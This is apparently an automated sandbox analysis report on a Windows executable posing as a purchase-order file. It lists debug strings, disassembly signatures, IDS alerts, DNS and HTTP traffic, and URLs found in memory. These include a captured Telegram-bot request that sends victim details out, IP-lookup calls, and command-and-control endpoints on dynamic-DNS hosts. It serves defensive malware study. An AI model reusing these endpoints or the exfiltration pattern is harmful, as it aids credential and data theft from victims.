Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdbpO& source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: >*OoVisualBasic.pdb! source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Web.Extensions.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb~ source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Core.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.pdblZ source: WERE482.tmp.dmp.15.dr
Source:	Binary string: O1.PDB source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
Source:	Binary string: uc.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Web.pdb source: WERE482.tmp.dmp.15.dr

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 0280F475h	4_2_0280F2D8
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 0280F475h	4_2_0280F4C4
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 0280FC31h	4_2_0280F979
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066A3308h	4_2_066A2EF0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066A2D41h	4_2_066A2A90
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_066A0673
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AD919h	4_2_066AD670
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AEA79h	4_2_066AE7D0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AF781h	4_2_066AF4D8
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066A3308h	4_2_066A3236
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AD4C1h	4_2_066AD218
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AE621h	4_2_066AE378
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_066A0040
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AF329h	4_2_066AF080
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066A3308h	4_2_066A2EE6
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AE1C9h	4_2_066ADF20
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AEED1h	4_2_066AEC28
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AD069h	4_2_066ACDC0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066ADD71h	4_2_066ADAC8
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066A0D0Dh	4_2_066A0B30
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066A16F8h	4_2_066A0B30
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_066A0853
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4x nop then jmp 066AFBD9h	4_2_066AF930

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.11:54971 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.11:54960 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2014/03/2025%20/%2006:54:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49702 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49699 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49701 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49707 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49700 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2014/03/2025%20/%2006:54:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 07:49:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000005.00000002.2366614968.00000202B9483000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.15.dr	String found in binary or memory: http://upx.sf.net
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000005.00000003.1203600977.00000202B92A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
